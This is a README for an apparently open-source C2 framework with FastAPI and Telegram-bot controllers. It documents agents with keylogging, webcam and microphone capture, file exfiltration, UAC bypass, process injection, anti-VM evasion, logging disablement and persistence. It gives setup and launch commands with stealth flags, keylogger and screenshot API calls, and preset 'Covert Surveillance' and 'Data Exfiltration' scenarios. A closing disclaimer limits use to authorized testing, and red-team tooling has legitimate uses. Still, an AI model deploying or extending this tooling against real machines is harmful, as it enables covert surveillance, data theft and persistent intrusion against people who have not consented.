A comprehensive Command and Control (C2) server built with FastAPI, featuring real-time agent management, advanced capabilities, and a professional red teaming interface. This platform is designed for advanced red team operations with extensive stealth, persistence, and evasion features.
In addition to the traditional HTTP-based server, we now include a Telegram-based C2 server that allows you to control agents through a Telegram bot instead of a web interface!
- Professional UI: Complete redesign with tabbed interface, professional styling, and enhanced usability
- Configuration Presets: Pre-configured attack scenarios (Covert Surveillance, Data Exfiltration, Lateral Movement, Minimal Recon)
- Advanced Capabilities: Screenshot capture, keylogger, file exfiltration, webcam/microphone access, privilege escalation, process injection, UAC bypass, DNS tunneling
- Stealth & Evasion: Anti-VM detection, integrity check bypass, reduced console output, system logging disablement
- Persistence Mechanisms: Startup, service, cron, launch agents, task scheduler, and hidden file options
- Encryption & Obfuscation: AES-256, ChaCha20, custom encryption, payload obfuscation, string encryption
- Command Generation: Real-time command-line generation in multiple formats (Python, PyInstaller, Batch, Shell)
- Network Configuration: Proxy support, custom headers, user-agent spoofing
- Agent Registry: Comprehensive agent information including capabilities, system specs, and enhanced metadata
- Advanced Command Interface: Screenshot and keylogger controls with capability detection
- Capability-Based UI: Dynamic dashboard controls based on agent capabilities
- Enhanced API Endpoints: New endpoints for advanced features with proper capability checking
- NEW: Telegram Bot Integration: Full C2 functionality available through Telegram bot commands
- Agent Management: Register, monitor, and manage multiple agents with enhanced information
- Command Execution: Execute shell commands on remote agents with real-time results
- Real-time Communication: WebSocket-based real-time updates and status monitoring
- File Transfer: Advanced file upload/download capabilities with enhanced security
- Heartbeat Monitoring: Track agent status, connectivity, and persistence
- Enhanced Web Dashboard: Modern, professional interface with real-time updates
- Stealth Operations: Reduced console output, system logging disablement, process hiding
- Persistence Mechanisms: Multiple cross-platform persistence options (startup, services, cron, etc.)
- Evasion Techniques: Anti-VM detection, integrity check bypass, sandbox detection
- Data Exfiltration: Secure file transfer with encryption and obfuscation
- Surveillance Capabilities: Screenshot capture, keylogging, webcam/microphone access
- Lateral Movement: Privilege escalation, process injection, UAC bypass
- NEW: Telegram Bot C2: Control agents through Telegram bot commands instead of HTTP requests
- Encryption: AES-256, ChaCha20 encryption with key management
- Payload Obfuscation: String encryption, variable name obfuscation, junk code addition
- Network Evasion: Proxy support, custom headers, user-agent spoofing
- Runtime Detection: Anti-analysis and anti-sandboxing capabilities
- FastAPI framework with async support
- WebSocket real-time updates
- Enhanced file upload/download capabilities
- Comprehensive logging and monitoring
- Health monitoring
- RESTful API with capability checking
- Professional dashboard with capability-based controls
Dashboard showing connected agents with capabilities and enhanced controls
Advanced command execution with real-time results and output formatting
![]() |
![]() |
|---|---|
![]() |
![]() |
| Professional GUI with tabbed interface, presets, and advanced configuration options |
- Python 3.7+
- pip package manager
-
Clone the repository:
git clone <repository-url> cd enhanced-c2
-
Install dependencies:
pip3 install -r requirements.txt
If you plan to use advanced features, also install:
pip3 install Pillow pynput cryptography pywin32 psutil pyautogui
-
Set up environment variables (optional):
cp .env.example .env # Edit .env with your configuration
-
Start the C2 Server:
python3 start_server.py
The server will start on
http://localhost:8000 -
Access the Web Dashboard: Open your browser and navigate to:
- Main Dashboard:
http://localhost:8000/ - Enhanced Dashboard:
http://localhost:8000/simple(Recommended) - API Documentation:
http://localhost:8000/docs
- Main Dashboard:
-
Start the GUI Client Builder:
python3 gui_client_builder.py
-
Configure your client:
- Select target platform, server settings, and client identification
- Choose advanced capabilities and stealth options
- Configure persistence mechanisms and encryption
- Apply one of the configuration presets or customize manually
- Generate the client with one click
# Advanced cross-platform agent with all features
python3 advanced_client.py --server http://localhost:8000 --client-id advanced-agent
# Platform-specific agents with enhanced features
python3 mac_client.py --client-id mac-agent --stealth --disable-logging
python3 linux_client.py --client-id linux-agent --stealth --disable-logging
python3 windows_client.py --client-id windows-agent --stealth --disable-loggingInstead of the traditional HTTP-based server, you can now use the Telegram bot C2 server:
-
Get a Telegram Bot Token:
- Message @BotFather on Telegram
- Use
/newbotto create a new bot - Get your bot token
- Get your Chat ID by messaging your bot and checking updates at
https://api.telegram.org/bot<TOKEN>/getUpdates
-
Set up environment variables:
export TELEGRAM_BOT_TOKEN="your_bot_token_here" export TELEGRAM_ADMIN_CHAT_ID="your_chat_id_here"
-
Start the Telegram C2 Server:
python3 start_telegram_server.py
-
Start a Telegram C2 Client:
python3 telegram_c2_client.py --client-id tg-agent-01 --beacon-interval 30
-
Control your agents through Telegram:
- Use
/agentsto list connected agents - Use
/cmd agent_id commandto execute commands - Use
/screenshot agent_idto take screenshots - Use
/keylog_start agent_idto start keylogging - Use
/filesto list server files - And much more!
- Use
For complete documentation on the Telegram C2 server, see TELEGRAM_C2_README.md.
- Platform Selection: Advanced (Cross-platform), Windows, Linux, macOS
- Server Configuration: Protocol (HTTP/HTTPS/WebSocket), IP, Port, Beacon Interval
- Client Identification: Client ID, Display Name
- Surveillance: Screenshot capture, keylogger, webcam/microphone access
- Data Exfiltration: File upload/download, process injection
- Access Escalation: Privilege escalation, UAC bypass
- Communication: DNS tunneling, network scanning
- Stealth Mode: Reduced console output, logging disablement
- Evasion Techniques: Anti-VM, integrity check bypass
- Process Control: Hide console window, disable system logging
- Startup: Registry, startup folder, autostart
- Services: Windows services, systemd, launch agents
- Scheduling: Cron jobs, task scheduler
- File Hiding: System file placement, attribute manipulation
- Encryption: AES-256, ChaCha20, custom encryption
- Obfuscation: String encryption, variable obfuscation, junk code
- Network: Proxy support, custom headers, user-agent spoofing
The server can be configured using environment variables or by modifying config.py:
SERVER_HOST: Server host (default: 0.0.0.0)SERVER_PORT: Server port (default: 8000)UPLOAD_DIR: Directory for uploaded filesDOWNLOAD_DIR: Directory for downloaded filesMAX_COMMAND_QUEUE_SIZE: Maximum commands per agent (default: 100)MAX_FILE_SIZE: Maximum file size in bytes (default: 50MB)SESSION_TIMEOUT: Session timeout in seconds (default: 3600)LOG_RETENTION_DAYS: Days to retain logs (default: 30)
Advanced clients support numerous command-line options:
python3 advanced_client.py --server http://server:port \
--client-id my-agent \
--display-name "My Agent" \
--beacon-interval 60 \
--stealth \
--hide-console \
--disable-logging \
--anti-vm \
--encryption AES-256 \
--encryption-key "mykey123"POST /api/auth/login- Login and get JWT token
POST /api/agents/register- Register a new agent with capabilitiesGET /api/agents- List all agentsGET /api/agents/{agent_id}/info- Get comprehensive agent infoGET /api/agents/enhanced- List agents with enhanced infoDELETE /api/agents/{agent_id}- Remove an agentPOST /api/agents/{agent_id}/heartbeat- Send heartbeat
POST /api/commands/execute- Execute a command on an agentGET /api/commands/{agent_id}- Get commands for an agentPOST /api/commands/result- Submit command resultGET /api/commands/{agent_id}/results- Get command results
POST /api/commands/screenshot- Queue screenshot commandPOST /api/commands/keylogger/start- Start keyloggerPOST /api/commands/keylogger/stop- Stop keyloggerPOST /api/commands/keylogger/data- Get keylogger data
POST /api/files/upload- Upload a fileGET /api/files/download/{filename}- Download a fileGET /api/files/list- List available files
GET /api/health- Health checkWS /ws- WebSocket for real-time updates
import requests
agent_data = {
"agent_id": "agent_001",
"display_name": "Covert Agent",
"hostname": "target-machine",
"username": "user",
"os_info": "Windows 10",
"ip_address": "192.168.1.100",
"port": 0,
"cpu_count": 4,
"memory_total": 8589934592,
"disk_total": 512107712512,
"capabilities": {
"screenshot": True,
"keylogger": True,
"file_exfiltration": True,
"webcam": True,
"privilege_escalation": True
}
}
response = requests.post("http://localhost:8000/api/agents/register", json=agent_data)command_data = {
"agent_id": "agent_001",
"command": "SCREENSHOT",
"command_type": "special"
}
response = requests.post("http://localhost:8000/api/commands/screenshot", json=command_data)# Start keylogger
response = requests.post("http://localhost:8000/api/commands/keylogger/start?agent_id=agent_001")
# Get keylogger data
response = requests.post("http://localhost:8000/api/commands/keylogger/data?agent_id=agent_001")
# Stop keylogger
response = requests.post("http://localhost:8000/api/commands/keylogger/stop?agent_id=agent_001")The enhanced web dashboard provides:
- Real-time agent monitoring with capability display
- Enhanced command execution interface
- Advanced agent control buttons (screenshot, keylogger)
- File management system
- System logs and activity monitoring
- Statistics and metrics
Access it at http://localhost:8000/simple after starting the server.
- Change default configurations
- Use strong, unique encryption keys
- Implement proper network security
- Add rate limiting and monitoring
- Use HTTPS/TLS encryption for production
- Implement proper logging and audit trails
- Validate and sanitize all inputs
- Use a proper database instead of in-memory storage
- Configure appropriate access controls
enhanced-c2/
βββ main.py # Main FastAPI application with enhanced features
βββ config.py # Configuration settings with enhanced options
βββ start_server.py # HTTP-based server startup script
βββ start_telegram_server.py # NEW: Telegram bot server startup script
βββ gui_client_builder.py # Advanced GUI client builder
βββ advanced_client.py # Enhanced multi-platform client with all features
βββ windows_client.py # Windows-specific enhanced client
βββ linux_client.py # Linux-specific enhanced client
βββ mac_client.py # macOS-specific enhanced client
βββ telegram_c2_server.py # NEW: Telegram bot C2 server
βββ telegram_c2_client.py # NEW: Telegram-based C2 client
βββ telegram_client_manager.py # NEW: Telegram client manager
βββ telegram_config.py # NEW: Telegram bot configuration
βββ requirements.txt # Python dependencies (includes Telegram bot deps)
βββ README.md # This file
βββ TELEGRAM_C2_README.md # NEW: Telegram C2 server documentation
βββ uploads/ # Upload directory
βββ downloads/ # Download directory
βββ screens/ # Screenshots directory
βββ static/ # Static files for web dashboard
βββ demos/ # Demo scripts
βββ docs/ # Documentation
- New API Endpoints: Add routes in
main.pywith proper capability checking - New Agent Commands: Extend the command execution system in client files
- Dashboard Enhancements: Update the HTML/JS in
main.pydashboard section - Security Improvements: Add additional security measures as needed
- Configure clients with screenshot, keylogger, and webcam capabilities
- Set stealth mode and disable logging
- Use persistence mechanisms for long-term access
- Implement encryption and network obfuscation
- Enable file exfiltration and process injection capabilities
- Configure custom encryption and obfuscation
- Set up multiple persistence mechanisms
- Implement proxy and custom header configuration
- Enable privilege escalation and UAC bypass features
- Configure process injection and network scanning
- Set up anti-VM and evasion techniques
- Use multiple beacon intervals for stealth
This project is for educational and authorized penetration testing purposes only. Use responsibly and in accordance with applicable laws and regulations. The use of this software for attacking targets without prior mutual consent is illegal.
- Fork the repository
- Create a feature branch (
git checkout -b feature/AmazingFeature) - Commit your changes (
git commit -m 'Add some AmazingFeature') - Push to the branch (
git push origin feature/AmazingFeature) - Open a Pull Request
For questions or issues, please open an issue on the repository. This project is intended for cybersecurity education and authorized testing only.
This software is provided for educational purposes only. The authors are not responsible for any misuse of this software. Always ensure you have explicit permission before testing on any system you do not own.



